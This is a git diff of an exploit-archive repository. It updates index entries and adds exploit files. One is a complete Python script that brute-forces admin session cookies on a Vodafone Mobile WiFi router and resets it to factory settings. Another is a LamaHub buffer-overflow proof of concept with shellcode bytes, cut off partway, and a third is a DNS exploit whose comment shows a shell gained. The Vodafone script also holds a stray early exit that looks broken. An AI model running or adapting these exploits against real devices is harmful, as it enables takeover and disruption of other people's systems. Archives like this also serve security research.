14399,platforms/windows/remote/14399.py,"Easy FTP Server 1.7.0.11 - Authenticated 'MKD' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
|
||||
14400,platforms/windows/remote/14400.py,"Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow",2010-07-17,"Karn Ganeshen",windows,remote,0
|
||||
14401,platforms/asp/webapps/14401.txt,"ClickAndRank Script - Authentication Bypass",2010-07-18,walid,asp,webapps,0
|
||||
14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - (Authenticated) 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0
|
||||
14402,platforms/windows/remote/14402.py,"Easy FTP Server 1.7.0.11 - Authenticated 'CWD' Command Remote Buffer Overflow",2010-07-18,fdiskyou,windows,remote,0
|
||||
14403,platforms/windows/local/14403.txt,"Microsoft Windows - Automatic LNK Shortcut File Code Execution",2010-07-18,Ivanlef0u,windows,local,0
|
||||
14406,platforms/bsd/local/14406.pl,"Ghostscript - '.PostScript' File Stack Overflow",2010-07-18,"Rodrigo Rubira Branco",bsd,local,0
|
||||
14407,platforms/aix/remote/14407.c,"rpc.pcnfsd - Remote Format String",2010-07-18,"Rodrigo Rubira Branco",aix,remote,0
|
||||
|
@ -12692,7 +12692,7 @@ id,file,description,date,author,platform,type,port
|
|||
14448,platforms/php/webapps/14448.txt,"Joomla Component (com_golfcourseguide) 0.9.6.0 (Beta) / 1 (Beta) - SQL Injection",2010-07-23,Valentin,php,webapps,0
|
||||
14449,platforms/php/webapps/14449.txt,"Joomla Component (com_huruhelpdesk) - SQL Injection",2010-07-23,Amine_92,php,webapps,0
|
||||
14450,platforms/php/webapps/14450.txt,"Joomla Component (com_iproperty) - SQL Injection",2010-07-23,Amine_92,php,webapps,0
|
||||
14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - (Authenticated) 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0
|
||||
14451,platforms/windows/remote/14451.rb,"Easy FTP Server 1.7.0.11 - Authenticated 'LIST' Command Remote Buffer Overflow (Metasploit)",2010-07-23,"Muhamad Fadzil Ramli",windows,remote,0
|
||||
14452,platforms/linux/dos/14452.txt,"FTP Client 0.17-19build1 ACCT (Ubuntu 10.04) - Buffer Overflow",2010-07-23,d0lc3,linux,dos,0
|
||||
14453,platforms/php/webapps/14453.txt,"PhotoPost PHP 4.6.5 - (ecard.php) SQL Injection",2010-07-23,CoBRa_21,php,webapps,0
|
||||
14454,platforms/php/webapps/14454.txt,"ValidForm Builder script - Remote Command Execution",2010-07-23,"HaCkEr arar",php,webapps,0
|
||||
|
@ -12721,7 +12721,7 @@ id,file,description,date,author,platform,type,port
|
|||
14484,platforms/windows/dos/14484.html,"Microsoft Internet Explorer 6 / 7 - Remote Denial of Service",2010-07-27,"Richard leahy",windows,dos,0
|
||||
14485,platforms/php/webapps/14485.txt,"nuBuilder 10.04.20 - Local File Inclusion",2010-07-27,"John Leitch",php,webapps,0
|
||||
14491,platforms/windows/local/14491.txt,"Zemana AntiLogger AntiLog32.sys 1.5.2.755 - Privilege Escalation",2010-07-28,th_decoder,windows,local,0
|
||||
14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - (Authenticated) HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0
|
||||
14496,platforms/windows/remote/14496.py,"UPlusFTP Server 1.7.1.01 - Authenticated HTTP Remote Buffer Overflow",2010-07-28,"Karn Ganeshen and corelanc0d3r",windows,remote,0
|
||||
14497,platforms/windows/local/14497.py,"WM Downloader 3.1.2.2 2010.04.15 - Buffer Overflow (SEH)",2010-07-28,fdiskyou,windows,local,0
|
||||
14488,platforms/php/webapps/14488.txt,"joomla Component appointinator 1.0.1 - Multiple Vulnerabilities",2010-07-27,"Salvatore Fresta",php,webapps,0
|
||||
14489,platforms/unix/remote/14489.c,"Apache Tomcat < 6.0.18 - utf8 Directory Traversal (2)",2010-07-28,mywisdom,unix,remote,0
|
||||
|
@ -12818,7 +12818,7 @@ id,file,description,date,author,platform,type,port
|
|||
14620,platforms/windows/dos/14620.py,"RightMark Audio Analyzer 6.2.3 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0
|
||||
14621,platforms/windows/dos/14621.py,"Abac Karaoke 2.15 - Denial of Service",2010-08-11,"Oh Yaw Theng",windows,dos,0
|
||||
14622,platforms/php/webapps/14622.txt,"KnowledgeTree 3.5.2 Community Edition - Permanent Cross-Site Scripting",2010-08-11,fdiskyou,php,webapps,0
|
||||
14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - (Authenticated) Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21
|
||||
14623,platforms/windows/remote/14623.py,"Easy FTP Server 1.7.0.11 - Authenticated Multiple Commands Remote Buffer Overflow",2010-08-11,"Glafkos Charalambous ",windows,remote,21
|
||||
14624,platforms/windows/dos/14624.py,"JaMP Player 4.2.2.0 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0
|
||||
14625,platforms/windows/dos/14625.py,"CombiWave Lite 4.0.1.4 - Denial of Service",2010-08-12,"Oh Yaw Theng",windows,dos,0
|
||||
14628,platforms/win_x86/webapps/14628.txt,"PHP-Nuke 8.1 SEO Arabic - Remote File Inclusion",2010-08-12,LoSt.HaCkEr,win_x86,webapps,80
|
||||
|
@ -14004,7 +14004,7 @@ id,file,description,date,author,platform,type,port
|
|||
16176,platforms/windows/remote/16176.pl,"ActFax Server (LPD/LPR) 4.25 Build 0221 (2010-02-11) - Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0
|
||||
16173,platforms/windows/local/16173.py,"AutoPlay 1.33 (autoplay.ini) - Local Buffer Overflow (SEH)",2011-02-15,badc0re,windows,local,0
|
||||
16175,platforms/php/webapps/16175.txt,"Seo Panel 2.2.0 - SQL Injection",2011-02-15,"High-Tech Bridge SA",php,webapps,0
|
||||
16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - (Authenticated) Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0
|
||||
16177,platforms/windows/remote/16177.py,"ActFax Server FTP 4.25 Build 0221 (2010-02-11) - Authenticated Remote Buffer Overflow",2011-02-16,chap0,windows,remote,0
|
||||
16178,platforms/asp/webapps/16178.txt,"Rae Media Real Estate Single Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0
|
||||
16179,platforms/asp/webapps/16179.txt,"Rae Media Real Estate Multi Agent - SQL Injection",2011-02-16,R4dc0re,asp,webapps,0
|
||||
16180,platforms/windows/dos/16180.py,"BWMeter 5.4.0 - '.csv' Denial of Service",2011-02-17,b0telh0,windows,dos,0
|
||||
|
@ -15100,7 +15100,7 @@ id,file,description,date,author,platform,type,port
|
|||
17366,platforms/windows/remote/17366.rb,"Cisco AnyConnect VPN Client - ActiveX URL Property Download and Execute",2011-06-06,Metasploit,windows,remote,0
|
||||
17367,platforms/php/webapps/17367.html,"Dataface - Local File Inclusion",2011-06-07,ITSecTeam,php,webapps,0
|
||||
17371,platforms/lin_x86/shellcode/17371.txt,"Linux/x86 - ConnectBack with SSL connection Shellcode (422 bytes)",2011-06-08,"Jonathan Salwan",lin_x86,shellcode,0
|
||||
17373,platforms/windows/remote/17373.py,"ActFax Server FTP - (Authenticated) Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0
|
||||
17373,platforms/windows/remote/17373.py,"ActFax Server FTP - Authenticated Remote Buffer Overflow",2011-06-08,b33f,windows,remote,0
|
||||
17372,platforms/windows/dos/17372.txt,"VLC Media Player - XSPF Local File Integer Overflow in XSPF Playlist parser",2011-06-08,TecR0c,windows,dos,0
|
||||
17374,platforms/windows/remote/17374.rb,"7-Technologies IGSS 9 - IGSSdataServer .Rms Rename Buffer Overflow",2011-06-09,Metasploit,windows,remote,0
|
||||
17375,platforms/asp/webapps/17375.txt,"EquiPCS - SQL Injection",2011-06-09,Sideswipe,asp,webapps,0
|
||||
|
@ -19332,7 +19332,7 @@ id,file,description,date,author,platform,type,port
|
|||
22066,platforms/linux/local/22066.c,"Exim Internet Mailer 3.35/3.36/4.10 - Format String",2002-12-04,"Thomas Wana",linux,local,0
|
||||
22067,platforms/unix/local/22067.txt,"SAP DB 7.3.00 - Symbolic Link",2002-12-04,"SAP Security",unix,local,0
|
||||
22068,platforms/unix/dos/22068.pl,"Apache 1.3.x + Tomcat 4.0.x/4.1.x Mod_JK - Chunked Encoding Denial of Service",2002-12-04,Sapient2003,unix,dos,0
|
||||
22069,platforms/multiple/local/22069.py,"Oracle Database - Protocol Authentication Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0
|
||||
22069,platforms/multiple/local/22069.py,"Oracle Database - Protocol Authentication Bypass",2012-10-18,"Esteban Martinez Fayo",multiple,local,0
|
||||
22070,platforms/windows/webapps/22070.py,"otrs 3.1 - Persistent Cross-Site Scripting",2012-10-18,"Mike Eduard",windows,webapps,0
|
||||
22071,platforms/php/webapps/22071.txt,"FireStorm Professional Real Estate WordPress Plugin 2.06.01 - SQL Injection",2012-10-18,"Ashiyane Digital Security Team",php,webapps,0
|
||||
22074,platforms/osx/dos/22074.txt,"Apple Mac OSX 10.2.2 - Directory Kernel Panic Denial of Service",2002-11-07,shibby,osx,dos,0
|
||||
|
@ -21659,7 +21659,7 @@ id,file,description,date,author,platform,type,port
|
|||
24477,platforms/hardware/webapps/24477.txt,"D-Link DIR-615 rev H - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
|
||||
24478,platforms/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0
|
||||
24479,platforms/windows/remote/24479.py,"Freefloat FTP 1.0 - Raw Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0
|
||||
24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - (Authenticated) Remote Command Execution",2013-02-11,aeon,php,webapps,0
|
||||
24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool - Authenticated Remote Command Execution",2013-02-11,aeon,php,webapps,0
|
||||
24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x / 5.0.x - Persistent Cross-Site Scripting",2013-02-11,"Mohamed Ramadan",php,webapps,0
|
||||
24483,platforms/hardware/webapps/24483.txt,"TP-Link Admin Panel - Multiple Cross-Site Request Forgery Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0
|
||||
24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0
|
||||
|
@ -25700,6 +25700,7 @@ id,file,description,date,author,platform,type,port
|
|||
28649,platforms/hardware/webapps/28649.txt,"Tenda W309R Router 5.07.46 - Configuration Disclosure",2013-09-30,SANTHO,hardware,webapps,0
|
||||
28650,platforms/windows/dos/28650.py,"KMPlayer 3.7.0.109 - '.wav' Crash (PoC)",2013-09-30,xboz,windows,dos,0
|
||||
28695,platforms/php/webapps/28695.txt,"CubeCart 3.0.x - admin/forgot_pass.php user_name Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0
|
||||
40359,platforms/osx/webapps/40359.txt,"Airmail 3.0.2 - Cross-Site Scripting",2016-09-09,redrain,osx,webapps,0
|
||||
28696,platforms/php/webapps/28696.txt,"CubeCart 3.0.x - view_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0
|
||||
28697,platforms/php/webapps/28697.txt,"CubeCart 3.0.x - view_doc.php view_doc Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0
|
||||
28698,platforms/php/webapps/28698.txt,"CubeCart 3.0.x - admin/print_order.php order_id Parameter SQL Injection",2006-09-26,"HACKERS PAL",php,webapps,0
|
||||
|
@ -27957,6 +27958,7 @@ id,file,description,date,author,platform,type,port
|
|||
31067,platforms/php/webapps/31067.txt,"ClanSphere 2007.4.4 - 'install.php' Local File Inclusion",2008-01-28,p4imi0,php,webapps,0
|
||||
31068,platforms/php/webapps/31068.txt,"Mambo MOStlyCE Module 2.4 Image Manager Utility - Arbitrary File Upload",2008-01-28,"AmnPardaz ",php,webapps,0
|
||||
31069,platforms/php/webapps/31069.txt,"eTicket 1.5.6-RC4 - 'index.php' Cross-Site Scripting",2008-01-28,jekil,php,webapps,0
|
||||
40358,platforms/linux/remote/40358.py,"LamaHub 0.0.6.2 - Buffer Overflow",2016-09-09,Pi3rrot,linux,remote,4111
|
||||
31070,platforms/asp/webapps/31070.txt,"ASPired2Protect Login Page - SQL Injection",2008-01-28,T_L_O_T_D,asp,webapps,0
|
||||
31071,platforms/cgi/webapps/31071.txt,"VB Marketing - 'tseekdir.cgi' Local File Inclusion",2008-01-28,"Sw33t h4cK3r",cgi,webapps,0
|
||||
31072,platforms/windows/remote/31072.html,"Symantec Backup Exec System Recovery Manager 7.0 - FileUpload Class Unauthorized File Upload",2007-01-05,titon,windows,remote,0
|
||||
|
@ -28056,6 +28058,7 @@ id,file,description,date,author,platform,type,port
|
|||
31334,platforms/php/webapps/31334.txt,"Mitra Informatika Solusindo Cart - 'p' Parameter SQL Injection",2008-03-04,bius,php,webapps,0
|
||||
31335,platforms/php/webapps/31335.txt,"MG2 - 'list' Parameter Cross-Site Scripting",2008-03-04,"Jose Carlos Norte",php,webapps,0
|
||||
31336,platforms/php/webapps/31336.txt,"Podcast Generator 0.96.2 - 'set_permissions.php' Cross-Site Scripting",2008-03-05,ZoRLu,php,webapps,0
|
||||
40357,platforms/hardware/webapps/40357.py,"Vodafone Mobile Wifi - Reset Admin Password",2016-09-09,"Daniele Linguaglossa",hardware,webapps,80
|
||||
31700,platforms/php/webapps/31700.txt,"e107 CMS 0.7 - Multiple Cross-Site Scripting Vulnerabilities",2008-04-24,ZoRLu,php,webapps,0
|
||||
31701,platforms/php/webapps/31701.txt,"Digital Hive 2.0 - 'base.php' Parameter Cross-Site Scripting",2008-04-24,ZoRLu,php,webapps,0
|
||||
31683,platforms/hardware/remote/31683.php,"Linksys E-series - Unauthenticated Remote Code Execution",2014-02-16,Rew,hardware,remote,0
|
||||
|
@ -28430,7 +28433,7 @@ id,file,description,date,author,platform,type,port
|
|||
31560,platforms/php/webapps/31560.txt,"Cuteflow Bin 1.5 - pages/showfields.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0
|
||||
31561,platforms/php/webapps/31561.txt,"Cuteflow Bin 1.5 - pages/showuser.php language Parameter Cross-Site Scripting",2008-03-29,hadihadi,php,webapps,0
|
||||
31562,platforms/windows/remote/31562.txt,"2X ThinClientServer 5.0 sp1-r3497 TFTP Service - Directory Traversal",2008-03-29,"Luigi Auriemma",windows,remote,0
|
||||
40353,platforms/php/webapps/40353.py,"Zabbix 2.0 - 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0
|
||||
40353,platforms/php/webapps/40353.py,"Zabbix 2.0 < 3.0.3 - SQL Injection",2016-09-08,Zzzians,php,webapps,0
|
||||
31563,platforms/windows/dos/31563.txt,"SLMail Pro 6.3.1.0 - Multiple Remote Denial Of Service / Memory Corruption Vulnerabilities",2008-03-31,"Luigi Auriemma",windows,dos,0
|
||||
31564,platforms/php/webapps/31564.txt,"Jack (tR) Jax LinkLists 1.00 - 'jax_linklists.php' Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0
|
||||
31565,platforms/php/webapps/31565.txt,"@lex Guestbook 4.0.5 - setup.php language_setup Parameter Cross-Site Scripting",2008-03-31,ZoRLu,php,webapps,0
|
||||
|
@ -33616,7 +33619,7 @@ id,file,description,date,author,platform,type,port
|
|||
37219,platforms/php/webapps/37219.txt,"PHP Address Book 7.0 - Multiple Cross-Site Scripting Vulnerabilities",2012-05-17,"Stefan Schurtz",php,webapps,0
|
||||
37220,platforms/jsp/webapps/37220.txt,"OpenKM 5.1.7 - Cross-Site Request Forgery",2012-05-03,"Cyrill Brunschwiler",jsp,webapps,0
|
||||
37221,platforms/jsp/webapps/37221.txt,"Atlassian JIRA FishEye 2.5.7 / Crucible 2.5.7 Plugins - XML Parsing Unspecified Security",2012-05-17,anonymous,jsp,webapps,0
|
||||
37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - (ASP ) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0
|
||||
37222,platforms/asp/webapps/37222.txt,"Acuity CMS 2.6.2 - (ASP) '/admin/file_manager/file_upload_submit.asp' Multiple Parameter Arbitrary File Upload / Code Execution",2012-05-21,"Aung Khant",asp,webapps,0
|
||||
37223,platforms/asp/webapps/37223.txt,"Acuity CMS 2.6.2 - '/admin/file_manager/browse.asp' path Parameter Traversal Arbitrary File Access",2012-05-21,"Aung Khant",asp,webapps,0
|
||||
37224,platforms/php/webapps/37224.txt,"Yandex.Server 2010 9.0 - 'text' Parameter Cross-Site Scripting",2012-05-21,MustLive,php,webapps,0
|
||||
37225,platforms/php/webapps/37225.pl,"Concrete CMS < 5.5.21 - Multiple Security Vulnerabilities",2012-05-20,AkaStep,php,webapps,0
|
||||
|
@ -34709,7 +34712,7 @@ id,file,description,date,author,platform,type,port
|
|||
38404,platforms/windows/dos/38404.py,"LanWhoIs.exe 1.0.1.120 - Stack Buffer Overflow",2015-10-06,hyp3rlinx,windows,dos,0
|
||||
38405,platforms/windows/dos/38405.py,"Last PassBroker 3.2.16 - Stack Based Buffer Overflow",2015-10-06,Un_N0n,windows,dos,0
|
||||
38406,platforms/php/webapps/38406.txt,"PHP-Fusion v7.02.07 - Blind SQL Injection",2015-10-06,"Manuel García Cárdenas",php,webapps,0
|
||||
38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0
|
||||
38407,platforms/php/webapps/38407.txt,"GLPI 0.85.5 - Arbitrary File Upload / Filter Bypass / Remote Code Execution",2015-10-06,"Raffaele Forte",php,webapps,0
|
||||
38408,platforms/php/webapps/38408.txt,"Jaow CMS - 'add_ons' Parameter Cross-Site Scripting",2013-03-23,Metropolis,php,webapps,0
|
||||
38409,platforms/hardware/webapps/38409.html,"ZTE ZXHN H108N - Unauthenticated Config Download",2015-10-06,"Todor Donev",hardware,webapps,0
|
||||
38410,platforms/php/webapps/38410.txt,"WordPress Banners Lite Plugin - 'wpbanners_show.php' HTML Injection",2013-03-25,"Fernando A. Lagos B",php,webapps,0
|
||||
|
@ -35517,8 +35520,8 @@ id,file,description,date,author,platform,type,port
|
|||
39255,platforms/php/webapps/39255.html,"WEBMIS CMS - Arbitrary File Upload",2014-07-14,"Jagriti Sahu",php,webapps,0
|
||||
39256,platforms/php/webapps/39256.txt,"Tera Charts (tera-charts) Plugin for Wordpress - charts/treemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0
|
||||
39257,platforms/php/webapps/39257.txt,"Tera Charts (tera-charts) Plugin for Wordpress - charts/zoomabletreemap.php fn Parameter Directory Traversal",2014-05-28,"Anant Shrivastava",php,webapps,0
|
||||
39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0
|
||||
39259,platforms/multiple/remote/39259.txt,"Alfresco - /cmisbrowser url Parameter Server Side Request Forgery (SSRF)",2014-07-16,"V. Paulikas",multiple,remote,0
|
||||
39258,platforms/multiple/remote/39258.txt,"Alfresco - /proxy endpoint Parameter Server Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0
|
||||
39259,platforms/multiple/remote/39259.txt,"Alfresco - /cmisbrowser url Parameter Server Side Request Forgery",2014-07-16,"V. Paulikas",multiple,remote,0
|
||||
39260,platforms/windows/local/39260.txt,"WEG SuperDrive G2 12.0.0 - Insecure File Permissions",2016-01-18,LiquidWorm,windows,local,0
|
||||
39261,platforms/php/webapps/39261.txt,"Advanced Electron Forum 1.0.9 - Cross-Site Request Forgery",2016-01-18,hyp3rlinx,php,webapps,80
|
||||
39262,platforms/php/webapps/39262.txt,"Advanced Electron Forum 1.0.9 - Persistent Cross-Site Scripting",2016-01-18,hyp3rlinx,php,webapps,80
|
||||
|
@ -36394,7 +36397,7 @@ id,file,description,date,author,platform,type,port
|
|||
40222,platforms/lin_x86/shellcode/40222.c,"Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
|
||||
40223,platforms/lin_x86/shellcode/40223.c,"Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)",2016-08-10,thryb,lin_x86,shellcode,0
|
||||
40224,platforms/windows/local/40224.txt,"Microsoft Word 2007/2010/2013/2016 - Out-of-Bounds Read Remote Code Execution (MS16-099)",2016-08-10,COSIG,windows,local,0
|
||||
40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery (SSRF)",2016-08-10,"Dawid Golunski",php,webapps,80
|
||||
40225,platforms/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server Side Request Forgery",2016-08-10,"Dawid Golunski",php,webapps,80
|
||||
40226,platforms/windows/local/40226.txt,"EyeLock Myris 3.3.2 - SDK Service Unquoted Service Path Privilege Escalation",2016-08-10,LiquidWorm,windows,local,0
|
||||
40227,platforms/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,php,webapps,80
|
||||
40228,platforms/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Root Exploit",2016-08-10,LiquidWorm,php,webapps,80
|
||||
|
|
Can't render this file because it is too large.
|
116
platforms/hardware/webapps/40357.py
Executable file
116
platforms/hardware/webapps/40357.py
Executable file
|
@ -0,0 +1,116 @@
|
|||
import urllib2
|
||||
import json
|
||||
from datetime import datetime, timedelta
|
||||
import time
|
||||
import httplib
|
||||
from threading import Thread
|
||||
from Queue import Queue
|
||||
from multiprocessing import process
|
||||
|
||||
|
||||
print """
|
||||
Vodafone Mobile WiFi - Password reset exploit (Daniele Linguaglossa)
|
||||
"""
|
||||
thread_lock = False
|
||||
session = ""
|
||||
def unix_time_millis(dt):
|
||||
epoch = datetime.utcfromtimestamp(0)
|
||||
return int(((dt - epoch).total_seconds() * 1000.0) / 1000)
|
||||
|
||||
a=False
|
||||
|
||||
def check_process_output():
|
||||
print 1
|
||||
|
||||
p = process.Process(target=check_process_output)
|
||||
p.start()
|
||||
|
||||
print a
|
||||
exit(0)
|
||||
|
||||
def crack(queue):
|
||||
global thread_lock
|
||||
global session
|
||||
while True:
|
||||
if thread_lock:
|
||||
exit(0)
|
||||
if not queue.empty():
|
||||
cookie = queue.get()
|
||||
headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % cookie}
|
||||
req = urllib2.Request("http://192.168.0.1/goform/goform_get_cmd_process?cmd=AuthMode&_=%s"
|
||||
% time.time(), None, headers)
|
||||
result = urllib2.urlopen(req).read()
|
||||
if json.loads(result)["AuthMode"] != "":
|
||||
print "[+] Found valid admin session!"
|
||||
print "[INFO] Terminating other threads ... please wait"
|
||||
session = cookie
|
||||
queue.task_done()
|
||||
thread_lock = True
|
||||
|
||||
|
||||
def start_threads_with_args(target, n, arg):
|
||||
thread_pool = []
|
||||
for n_threads in range(0, n):
|
||||
thread = Thread(target=target, args=(arg,))
|
||||
thread_pool.append(thread)
|
||||
thread_pool[-1].start()
|
||||
return thread_pool
|
||||
|
||||
def start_bruteforce():
|
||||
global session
|
||||
global thread_lock
|
||||
queue = Queue(0)
|
||||
start_threads_with_args(crack, 15, queue)
|
||||
print"[!] Trying fast bruteforce..."
|
||||
for x in range(0, 1000):
|
||||
if thread_lock:
|
||||
break
|
||||
queue.put("123abc456def789%03d" % x)
|
||||
while True:
|
||||
if session != "":
|
||||
return session
|
||||
if queue.empty():
|
||||
break
|
||||
print "[!] Trying slow bruteforce..."
|
||||
for milliseconds in range(0, how_many):
|
||||
if thread_lock:
|
||||
break
|
||||
queue.put("123abc456def789%s" % (start + milliseconds))
|
||||
while True:
|
||||
if session != "":
|
||||
return session
|
||||
if queue.empty():
|
||||
break
|
||||
return session
|
||||
if __name__ == "__main__":
|
||||
now = datetime.now()
|
||||
hours = raw_input("How many hours ago admin logged in: ")
|
||||
minutes = raw_input("How many minutes ago admin logged in: ")
|
||||
init = datetime(now.year, now.month, now.day, now.hour, now.minute) - timedelta(hours=int(hours), minutes=int(minutes))
|
||||
end = datetime(now.year, now.month, now.day, 23, 59, 59, 999999)
|
||||
start = unix_time_millis(init)
|
||||
how_many = unix_time_millis(end) - start + 1
|
||||
print "[+] Starting session bruteforce with 15 threads"
|
||||
valid_session = ""
|
||||
try:
|
||||
valid_session = start_bruteforce()
|
||||
except KeyboardInterrupt:
|
||||
print "[-] Exiting.."
|
||||
thread_lock = True
|
||||
exit(0)
|
||||
if valid_session == "":
|
||||
print "[!] Can't find valid session :( quitting..."
|
||||
exit(0)
|
||||
print "[+] Resetting router password to 'admin' , network may be down for a while"
|
||||
headers = {'Referer': 'http://192.168.0.1/home.htm', 'Cookie': "stok=%s" % valid_session}
|
||||
req = urllib2.Request("http://192.168.0.1/goform/goform_set_cmd_process",
|
||||
"goformId=RESTORE_FACTORY_SETTINGS&_=%s" % time.time(), headers)
|
||||
try:
|
||||
urllib2.urlopen(req).read()
|
||||
except httplib.BadStatusLine:
|
||||
print "[!] Password resetted to admin! have fun!"
|
||||
exit(0)
|
||||
except Exception:
|
||||
print "[x] Error during password reset"
|
||||
print "[-] Can't reset password try manually, your session is: %s" % valid_session
|
||||
|
|
@ -1,4 +1,6 @@
|
|||
'''
|
||||
|
||||
/*
|
||||
|
||||
add by SpeeDr00t@Blackfalcon (jang kyoung chip)
|
||||
|
||||
This is a published vulnerability by google in the past.
|
||||
|
@ -14,9 +16,7 @@ it was missing information on shellcode.
|
|||
So, I tried to completed the shellcode.
|
||||
In the future, I hope to help your study.
|
||||
|
||||
|
||||
(gdb) gdb -q client1
|
||||
Undefined command: "gdb". Try "help".
|
||||
|
||||
(gdb) r
|
||||
Starting program: /home/haker/client1
|
||||
Got object file from memory but can't read symbols: File truncated.
|
||||
|
@ -27,8 +27,8 @@ sendto 1
|
|||
TCP Connected with 127.0.0.1:60259
|
||||
[TCP] Total Data len recv 76
|
||||
[TCP] Request1 len recv 36
|
||||
data1 = <EFBFBD><EFBFBD>foobargooglecom
|
||||
query = foobargooglecom$(<EFBFBD>foobargooglecom
|
||||
data1 = ��foobargooglecom
|
||||
query = foobargooglecom$(�foobargooglecom
|
||||
[TCP] Request2 len recv 36
|
||||
sendto 2
|
||||
data1_reply
|
||||
|
@ -40,8 +40,8 @@ sendto 1
|
|||
TCP Connected with 127.0.0.1:60260
|
||||
[TCP] Total Data len recv 76
|
||||
[TCP] Request1 len recv 36
|
||||
data1 = <EFBFBD><EFBFBD>foobargooglecom
|
||||
query = foobargooglecom$<EFBFBD>7foobargooglecom
|
||||
data1 = ��foobargooglecom
|
||||
query = foobargooglecom$�7foobargooglecom
|
||||
[TCP] Request2 len recv 36
|
||||
sendto 2
|
||||
data1_reply
|
||||
|
@ -49,9 +49,12 @@ data2_reply
|
|||
process 6415 is executing new program: /bin/dash
|
||||
$ id
|
||||
uid=1000(haker) gid=1000(haker) groups=1000(haker),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lpadmin),124(sambashare)
|
||||
$
|
||||
$
|
||||
|
||||
*/
|
||||
|
||||
|
||||
|
||||
'''
|
||||
|
||||
import socket
|
||||
import time
|
||||
|
@ -235,4 +238,4 @@ if __name__ == "__main__":
|
|||
t.daemon = True
|
||||
t.start()
|
||||
tcp_thread()
|
||||
terminate = True
|
||||
terminate = True
|
85
platforms/linux/remote/40358.py
Executable file
85
platforms/linux/remote/40358.py
Executable file
|
@ -0,0 +1,85 @@
|
|||
# Exploit Title: LamaHub-0.0.6.2 BufferOverflow
|
||||
# Date: 09/09/09
|
||||
# Exploit Author: Pi3rrot
|
||||
# Vendor Homepage: http://lamahub.sourceforge.net/
|
||||
# Software Link: http://ovh.dl.sourceforge.net/sourceforge/lamahub/LamaHub-0.0.6.2.tar.gz
|
||||
# Version: 0.0.6.2
|
||||
# Tested on: Debian 8 32bits
|
||||
|
||||
# This exploit may crash the Lamahub service in many cases.
|
||||
# If you compile with -fno-stack-protection and -z execstack
|
||||
# you will be able to execute arbitrary code.
|
||||
#
|
||||
# Thanks to the AFL dev' for making the fuzzer who find the crash ;)
|
||||
# Thanks to gapz for AFL configuration.
|
||||
#
|
||||
# pierre@pi3rrot.net
|
||||
|
||||
|
||||
# How it works ?
|
||||
# Client side:
|
||||
# exploit_writeEIP.py
|
||||
|
||||
# Server side:
|
||||
# ➜ ./server
|
||||
# > init () -> OK
|
||||
# > started on port -> 4111
|
||||
# > new client -> 127.0.0.1 -> 4
|
||||
# $ whoami
|
||||
# pierre
|
||||
# $
|
||||
|
||||
|
||||
import socket
|
||||
|
||||
HOST = 'localhost'
|
||||
PORT = 4111
|
||||
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||||
s.connect((HOST, PORT))
|
||||
|
||||
buf = ""
|
||||
buf += "\x24\x53\x75\x70\x70\x6f\x72\x74\x73\x20\x55\x73"
|
||||
buf += "\x6c\x6c\x6f\x20\x49\x50\x32\x20\x65\x61\x72\x63"
|
||||
